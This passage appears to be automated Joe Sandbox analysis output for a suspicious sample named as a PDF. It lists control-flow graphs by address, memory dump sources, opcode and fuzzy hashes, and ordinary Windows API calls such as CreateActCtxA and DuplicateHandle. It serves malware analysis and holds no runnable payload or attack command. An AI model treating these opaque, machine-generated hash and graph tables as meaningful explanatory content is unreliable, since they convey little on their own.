                                                                                                                                                                                control_flow_graph 1529 6ce1c80-6ce2bc0 1532 6ce2bc6-6ce2bcb 1529->1532 1533 6ce30a3-6ce310c 1529->1533 1532->1533 1534 6ce2bd1-6ce2bee 1532->1534 1541 6ce3113-6ce319b 1533->1541 1540 6ce2bf4-6ce2bf8 1534->1540 1534->1541 1542 6ce2bfa-6ce2bff call 6ce1c90 1540->1542 1543 6ce2c07-6ce2c0b 1540->1543 1585 6ce31a6-6ce3226 1541->1585 1549 6ce2c04 1542->1549 1546 6ce2c0d-6ce2c17 call 6ce1c90 1543->1546 1547 6ce2c1a-6ce2c21 1543->1547 1546->1547 1551 6ce2d3c-6ce2d41 1547->1551 1552 6ce2c27-6ce2c57 1547->1552 1549->1543 1556 6ce2d49-6ce2d4e 1551->1556 1557 6ce2d43-6ce2d47 1551->1557 1561 6ce2c5d-6ce2d30 call 6ce1c9c * 2 1552->1561 1562 6ce3426-6ce34a2 1552->1562 1560 6ce2d60-6ce2d90 call 6ce1ca8 * 3 1556->1560 1557->1556 1559 6ce2d50-6ce2d54 1557->1559 1559->1562 1566 6ce2d5a-6ce2d5d 1559->1566 1560->1585 1586 6ce2d96-6ce2d99 1560->1586 1561->1551 1595 6ce2d32 1561->1595 1581 6ce34ab-6ce34c8 1562->1581 1582 6ce34a4-6ce34aa 1562->1582 1566->1560 1582->1581 1602 6ce322d-6ce32af 1585->1602 1586->1585 1589 6ce2d9f-6ce2da1 1586->1589 1589->1585 1593 6ce2da7-6ce2ddc 1589->1593 1593->1602 1603 6ce2de2-6ce2deb 1593->1603 1595->1551 1610 6ce32b7-6ce3339 1602->1610 1605 6ce2f4e-6ce2f52 1603->1605 1606 6ce2df1-6ce2e4b call 6ce1ca8 * 2 call 6ce1cb8 * 2 1603->1606 1609 6ce2f58-6ce2f5c 1605->1609 1605->1610 1650 6ce2e5d 1606->1650 1651 6ce2e4d-6ce2e56 1606->1651 1613 6ce2f62-6ce2f68 1609->1613 1614 6ce3341-6ce336e 1609->1614 1610->1614 1618 6ce2f6c-6ce2fa1 1613->1618 1619 6ce2f6a 1613->1619 1627 6ce3375-6ce33f5 1614->1627 1620 6ce2fa8-6ce2fae 1618->1620 1619->1620 1626 6ce2fb4-6ce2fbc 1620->1626 1620->1627 1632 6ce2fbe-6ce2fc2 1626->1632 1633 6ce2fc3-6ce2fc5 1626->1633 1683 6ce33fc-6ce341e 1627->1683 1632->1633 1639 6ce3027-6ce302d 1633->1639 1640 6ce2fc7-6ce2feb 1633->1640 1645 6ce302f-6ce304a 1639->1645 1646 6ce304c-6ce307a 1639->1646 1668 6ce2fed-6ce2ff2 1640->1668 1669 6ce2ff4-6ce2ff8 1640->1669 1666 6ce3082-6ce308e 1645->1666 1646->1666 1656 6ce2e61-6ce2e63 1650->1656 1655 6ce2e58-6ce2e5b 1651->1655 1651->1656 1655->1656 1664 6ce2e6a-6ce2e6e 1656->1664 1665 6ce2e65 1656->1665 1670 6ce2e7c-6ce2e82 1664->1670 1671 6ce2e70-6ce2e77 1664->1671 1665->1664 1666->1683 1684 6ce3094-6ce30a0 1666->1684 1675 6ce3004-6ce3025 1668->1675 1669->1562 1676 6ce2ffe-6ce3001 1669->1676 1672 6ce2e8c-6ce2e91 1670->1672 1673 6ce2e84-6ce2e8a 1670->1673 1680 6ce2f19-6ce2f1d 1671->1680 1681 6ce2e97-6ce2e9d 1672->1681 1673->1681 1675->1666 1676->1675 1685 6ce2f1f-6ce2f39 1680->1685 1686 6ce2f3c-6ce2f48 1680->1686 1688 6ce2e9f-6ce2ea1 1681->1688 1689 6ce2ea3-6ce2ea8 1681->1689 1683->1562 1685->1686 1686->1605 1686->1606 1695 6ce2eaa-6ce2ebc 1688->1695 1689->1695 1701 6ce2ebe-6ce2ec4 1695->1701 1702 6ce2ec6-6ce2ecb 1695->1702 1703 6ce2ed1-6ce2ed8 1701->1703 1702->1703 1708 6ce2ede 1703->1708 1709 6ce2eda-6ce2edc 1703->1709 1710 6ce2ee3-6ce2eee 1708->1710 1709->1710 1712 6ce2f12 1710->1712 1713 6ce2ef0-6ce2ef3 1710->1713 1712->1680 1713->1680 1715 6ce2ef5-6ce2efb 1713->1715 1716 6ce2efd-6ce2f00 1715->1716 1717 6ce2f02-6ce2f0b 1715->1717 1716->1712 1716->1717 1717->1680 1719 6ce2f0d-6ce2f10 1717->1719 1719->1680 1719->1712
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                                • API String ID: 0-1677660839
                                                                                                                                                                                • Opcode ID: 6f6570ae69606e7d570a0c39958e6d6040f1a394c860c7560e33fa83edfaa955
                                                                                                                                                                                • Instruction ID: 197d5a98a849541e867935fce3e21260d7f8f3de0efdb63ab1e24a1c89332eb8
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f6570ae69606e7d570a0c39958e6d6040f1a394c860c7560e33fa83edfaa955
                                                                                                                                                                                • Instruction Fuzzy Hash: D3424E70E00258CFDB94DFB9C85079EBBF6AF88300F14856AD409AB395DB349A45CFA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1743 4ddfb18-4ddfb25 1744 4ddfb2e-4ddfb3e 1743->1744 1745 4ddfb27-4ddfb29 1743->1745 1747 4ddfb45-4ddfb55 1744->1747 1748 4ddfb40 1744->1748 1746 4ddfdcd-4ddfdd4 1745->1746 1750 4ddfb5b-4ddfb69 1747->1750 1751 4ddfdb4-4ddfdc2 1747->1751 1748->1746 1754 4ddfdd5-4ddfe4e 1750->1754 1756 4ddfb6f 1750->1756 1751->1754 1755 4ddfdc4-4ddfdc6 1751->1755 1755->1746 1756->1754 1757 4ddfc9f-4ddfcc7 1756->1757 1758 4ddfd39-4ddfd65 1756->1758 1759 4ddfbda-4ddfbfb 1756->1759 1760 4ddfb76-4ddfb88 1756->1760 1761 4ddfbb3-4ddfbd5 1756->1761 1762 4ddfc72-4ddfc9a 1756->1762 1763 4ddfb8d-4ddfbae 1756->1763 1764 4ddfc4c-4ddfc6d 1756->1764 1765 4ddfccc-4ddfd09 1756->1765 1766 4ddfd0e-4ddfd34 1756->1766 1767 4ddfda8-4ddfdb2 1756->1767 1768 4ddfd84-4ddfda6 1756->1768 1769 4ddfd67-4ddfd82 1756->1769 1770 4ddfc26-4ddfc47 1756->1770 1771 4ddfc00-4ddfc21 1756->1771 1757->1746 1758->1746 1759->1746 1760->1746 1761->1746 1762->1746 1763->1746 1764->1746 1765->1746 1766->1746 1767->1746 1768->1746 1769->1746 1770->1746 1771->1746
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xbq$$^q
                                                                                                                                                                                • API String ID: 0-1593437937
                                                                                                                                                                                • Opcode ID: 7a9ac11bbe241b1934c46ab1a5060b67d54380cb231aa12c780f68e3c0bd42c2
                                                                                                                                                                                • Instruction ID: 661020f11b6ba51819c5fea188c7cf06aab6855a54a95fa9d022072eb51c0534
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a9ac11bbe241b1934c46ab1a5060b67d54380cb231aa12c780f68e3c0bd42c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 54817074B002188BDB18AF799C5467E7BB7BFC8710B04892EE457E7398DE34D80297A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1d0ac3341467674c871bfeabe86dbcc3b2298393feb872d287c207c1a6c93da8
                                                                                                                                                                                • Instruction ID: b74fdf29f712f628edf749d37cc0ee965e3bba1a09412baa7a1b4297b2ebdc39
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d0ac3341467674c871bfeabe86dbcc3b2298393feb872d287c207c1a6c93da8
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DD13A30E00309CFDB64DFA9C948B9DBBB1BF88304F158569D409AB3A5DB74E945CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: afdeef0b502bd7f1ec16668a13cd66a5fb951556632b6418d4ca5524765b6327
                                                                                                                                                                                • Instruction ID: 6e5196bfa843bdabb6378a4fd13bef9654dc1618f83c0ca327b5fac7e2b0abce
                                                                                                                                                                                • Opcode Fuzzy Hash: afdeef0b502bd7f1ec16668a13cd66a5fb951556632b6418d4ca5524765b6327
                                                                                                                                                                                • Instruction Fuzzy Hash: 32C17C31E002588FDF55DF65C880B9DBBF2AF88310F04C5AAD459AB255DB34EA85CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 71aad027690eb6c7987b3477c5c8808401016cbf777b85fc6c568edb729580aa
                                                                                                                                                                                • Instruction ID: 60e5e4686677de81b0045018be869a79f1795145a192be834ec348619dbeda15
                                                                                                                                                                                • Opcode Fuzzy Hash: 71aad027690eb6c7987b3477c5c8808401016cbf777b85fc6c568edb729580aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 46A1CE74E012198FDB14DFA9D584A9DFBF2FF48310F1495AAE408AB356DB34A981CF90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1987 27cad48-27cad57 1988 27cad59-27cad66 call 27ca0a0 1987->1988 1989 27cad83-27cad87 1987->1989 1996 27cad7c 1988->1996 1997 27cad68 1988->1997 1990 27cad89-27cad93 1989->1990 1991 27cad9b-27caddc 1989->1991 1990->1991 1998 27cadde-27cade6 1991->1998 1999 27cade9-27cadf7 1991->1999 1996->1989 2044 27cad6e call 27cafe0 1997->2044 2045 27cad6e call 27cafd0 1997->2045 1998->1999 2001 27cadf9-27cadfe 1999->2001 2002 27cae1b-27cae1d 1999->2002 2000 27cad74-27cad76 2000->1996 2003 27caeb8-27caf34 2000->2003 2005 27cae09 2001->2005 2006 27cae00-27cae07 call 27ca0ac 2001->2006 2004 27cae20-27cae27 2002->2004 2037 27caf36-27caf5e 2003->2037 2038 27caf60-27caf78 2003->2038 2008 27cae29-27cae31 2004->2008 2009 27cae34-27cae3b 2004->2009 2007 27cae0b-27cae19 2005->2007 2006->2007 2007->2004 2008->2009 2012 27cae3d-27cae45 2009->2012 2013 27cae48-27cae4a call 27ca0bc 2009->2013 2012->2013 2016 27cae4f-27cae51 2013->2016 2018 27cae5e-27cae63 2016->2018 2019 27cae53-27cae5b 2016->2019 2020 27cae65-27cae6c 2018->2020 2021 27cae81-27cae8e 2018->2021 2019->2018 2020->2021 2023 27cae6e-27cae7e call 27ca0cc call 27ca0dc 2020->2023 2028 27cae90-27caeae 2021->2028 2029 27caeb1-27caeb7 2021->2029 2023->2021 2028->2029 2037->2038 2039 27caf7a-27caf7d 2038->2039 2040 27caf80-27cafab GetModuleHandleW 2038->2040 2039->2040 2041 27cafad-27cafb3 2040->2041 2042 27cafb4-27cafc8 2040->2042 2041->2042 2044->2000 2045->2000
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 027CAF9E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: deda1b07d20ffba9892e967beadd3aa1285191c7c934467a9bfc76590f589b8c
                                                                                                                                                                                • Instruction ID: bd977d3853c4cb85d2d252f6fef08de4ffef074807a068c8b48dbe9d8653ce13
                                                                                                                                                                                • Opcode Fuzzy Hash: deda1b07d20ffba9892e967beadd3aa1285191c7c934467a9bfc76590f589b8c
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D8143B0A00B098FDB24DF79D54579ABBF1FF88345F108A2DD48A9BA50DB35E845CB90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2046 27c590d-27c59d9 CreateActCtxA 2048 27c59db-27c59e1 2046->2048 2049 27c59e2-27c5a3c 2046->2049 2048->2049 2056 27c5a3e-27c5a41 2049->2056 2057 27c5a4b-27c5a4f 2049->2057 2056->2057 2058 27c5a60 2057->2058 2059 27c5a51-27c5a5d 2057->2059 2061 27c5a61 2058->2061 2059->2058 2061->2061
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 027C59C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: d9fb548e70b6e3f8202e47992bd7885cb94a43eb36ee66c740363f684b4bd3e7
                                                                                                                                                                                • Instruction ID: 9e540a526d1f0a58528986b2eea1ccf4a839a03bc184028bc9d33002ad0cb8f0
                                                                                                                                                                                • Opcode Fuzzy Hash: d9fb548e70b6e3f8202e47992bd7885cb94a43eb36ee66c740363f684b4bd3e7
                                                                                                                                                                                • Instruction Fuzzy Hash: F741D1B0D00619CEDB24CFAAC884ADDBBB5BF49304F6481AAD408BB255DB756949CF90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2062 27c4248-27c59d9 CreateActCtxA 2065 27c59db-27c59e1 2062->2065 2066 27c59e2-27c5a3c 2062->2066 2065->2066 2073 27c5a3e-27c5a41 2066->2073 2074 27c5a4b-27c5a4f 2066->2074 2073->2074 2075 27c5a60 2074->2075 2076 27c5a51-27c5a5d 2074->2076 2078 27c5a61 2075->2078 2076->2075 2078->2078
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 027C59C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: 84596980f744b66c6f4a7907c3edfd6559b0d2d5c4c8c98f987b4778ae4e3fe8
                                                                                                                                                                                • Instruction ID: aa6bcae37750c86a87754b5792ce16c4007954073be2a5b455c93b5de9429c49
                                                                                                                                                                                • Opcode Fuzzy Hash: 84596980f744b66c6f4a7907c3edfd6559b0d2d5c4c8c98f987b4778ae4e3fe8
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E41B3B0D00619CBDB24DFA9C88469DBBB5BF49304F648059D408BB255DB756945CF90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2079 4dd4050-4dd408c 2080 4dd413c-4dd415c 2079->2080 2081 4dd4092-4dd4097 2079->2081 2087 4dd415f-4dd416c 2080->2087 2082 4dd4099-4dd40d0 2081->2082 2083 4dd40ea-4dd4122 CallWindowProcW 2081->2083 2089 4dd40d9-4dd40e8 2082->2089 2090 4dd40d2-4dd40d8 2082->2090 2084 4dd412b-4dd413a 2083->2084 2085 4dd4124-4dd412a 2083->2085 2084->2087 2085->2084 2089->2087 2090->2089
                                                                                                                                                                                APIs
                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DD4111
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallProcWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                                                                • Opcode ID: c71ecb280af88162914a166f831ef8971a67cc3580e45c9e1f0570e5b09dc419
                                                                                                                                                                                • Instruction ID: b7fa8ff0368a7fd10ad3da0e9f8f62e2bd7ebcfb24caa2fb1b9339abb51be5c0
                                                                                                                                                                                • Opcode Fuzzy Hash: c71ecb280af88162914a166f831ef8971a67cc3580e45c9e1f0570e5b09dc419
                                                                                                                                                                                • Instruction Fuzzy Hash: C44149B8A00309DFDB14CF99C848AAABBF5FB88314F24C459D519AB321D774A841CFA0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2093 6ce3708-6ce3714 2094 6ce371a-6ce37ca SendMessageW 2093->2094 2095 6ce3716-6ce3719 2093->2095 2101 6ce37cc-6ce37d2 2094->2101 2102 6ce37d3-6ce37e7 2094->2102 2101->2102
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,?,?,?), ref: 06CE37BD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 453ea634ce390e6ae95beb1178fe560fe25f907e308b368c7610669397242a47
                                                                                                                                                                                • Instruction ID: 946e0d1e862b3d1a93a9cb0bb62500a06478e1e087712d781d908d7d8e9e7c1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 453ea634ce390e6ae95beb1178fe560fe25f907e308b368c7610669397242a47
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B2157B6A00248DFCB10DFA9D584ADEBFF4EF48310F24845AE459A7751C734A980CFA4

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2104 6ce5271-6ce530a PostMessageW 2105 6ce530c-6ce5312 2104->2105 2106 6ce5313-6ce5334 2104->2106 2105->2106
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 06CE52FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 655ea99624b65297b67b0f576c856f6311a175a7cebef82cb9cae5714ba3ba95
                                                                                                                                                                                • Instruction ID: e34f98cadeba52aea24bef0b67a54f2701063f2081950bb569222311b49b93f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 655ea99624b65297b67b0f576c856f6311a175a7cebef82cb9cae5714ba3ba95
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B2164B68003488FDB10CFA9C985BDEBFF8EF19320F14845AD854A7251C338AA44CFA1

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2108 27cb730-27cd6b4 DuplicateHandle 2110 27cd6bd-27cd6da 2108->2110 2111 27cd6b6-27cd6bc 2108->2111 2111->2110
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CD5E6,?,?,?,?,?), ref: 027CD6A7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: db197e10da080a7c32ffca42a331be688c3c1812cd1f3717a59c174d2ad283b1
                                                                                                                                                                                • Instruction ID: df910aa3cec81967903e26c2922bf332f40b319ee059e75a9ec52102c017c39c
                                                                                                                                                                                • Opcode Fuzzy Hash: db197e10da080a7c32ffca42a331be688c3c1812cd1f3717a59c174d2ad283b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 1521E5B5900208AFDB10DFAAD584ADEBBF4EB48310F14806AE958B7310D374A940CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027CD5E6,?,?,?,?,?), ref: 027CD6A7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: a9a4895def99db74e4aa7d63b6d3969c0a01e98f8a63d3605a08140952a62804
                                                                                                                                                                                • Instruction ID: cba9883d853375b6c67b30effdd47ca199b619d15a057cf182c45d48a4e4fdfa
                                                                                                                                                                                • Opcode Fuzzy Hash: a9a4895def99db74e4aa7d63b6d3969c0a01e98f8a63d3605a08140952a62804
                                                                                                                                                                                • Instruction Fuzzy Hash: B321E4B59002589FDB10CFAAD584ADEBFF4EB48314F24802AE958B7310C374A944CFA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 06CEE9D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePeek
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2222842502-0
                                                                                                                                                                                • Opcode ID: ce920a6a8cfea58ab3beae3b9439aafaa8d31312cc64c2beae29b0d1f3121afc
                                                                                                                                                                                • Instruction ID: df12c139d67aff3966833f68a30fc6b03069209cfda32855fe67e54cb9a8a970
                                                                                                                                                                                • Opcode Fuzzy Hash: ce920a6a8cfea58ab3beae3b9439aafaa8d31312cc64c2beae29b0d1f3121afc
                                                                                                                                                                                • Instruction Fuzzy Hash: B22168B5C04349DFDB10DF9AD844ADEBBF4EB09354F10802AE994A7351C378A944CFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 06CE15D2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: TextWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 530164218-0
                                                                                                                                                                                • Opcode ID: 5f0789267bb9dd2caafd6affd562006da4bde74b35236e1db7fffe00937ca962
                                                                                                                                                                                • Instruction ID: fe93ecbf731c124bd175f10d1ad1457c1b18b4a030a4e2c31f3f0121e72e4b47
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f0789267bb9dd2caafd6affd562006da4bde74b35236e1db7fffe00937ca962
                                                                                                                                                                                • Instruction Fuzzy Hash: B41103B6D007098FDB14CF9AC544BEEBBF4AB48320F14C42AD859A7650D738A645CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 06CE15D2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: TextWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 530164218-0
                                                                                                                                                                                • Opcode ID: a6a6080e65b023e9f47876fcb9d76c7c81ea0801c65135d68a39b3cde8c89f0d
                                                                                                                                                                                • Instruction ID: cab215ef0322debf895d6836f65218f92c0cb62a8dbad89804ffb4e1ddce97ae
                                                                                                                                                                                • Opcode Fuzzy Hash: a6a6080e65b023e9f47876fcb9d76c7c81ea0801c65135d68a39b3cde8c89f0d
                                                                                                                                                                                • Instruction Fuzzy Hash: F31114B6C002498FDB10CF9AC444ADEFBF4EB88320F14C02AD859A7650D738A645CFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 06CEE9D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePeek
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2222842502-0
                                                                                                                                                                                • Opcode ID: 4c82b9e26b7e2cbeedf0644831e4f2d7331e6aa426703042a8e02aea700427b6
                                                                                                                                                                                • Instruction ID: 4bf6da5e5eea87dcc5f694753a8c3f345cbd2a4008851d699433710bf08c2a20
                                                                                                                                                                                • Opcode Fuzzy Hash: 4c82b9e26b7e2cbeedf0644831e4f2d7331e6aa426703042a8e02aea700427b6
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11F6B5C002499FDB10CF9AD844BDEBBF8EB48360F10842AE558A3251C378A944CFA5
                                                                                                                                                                                APIs
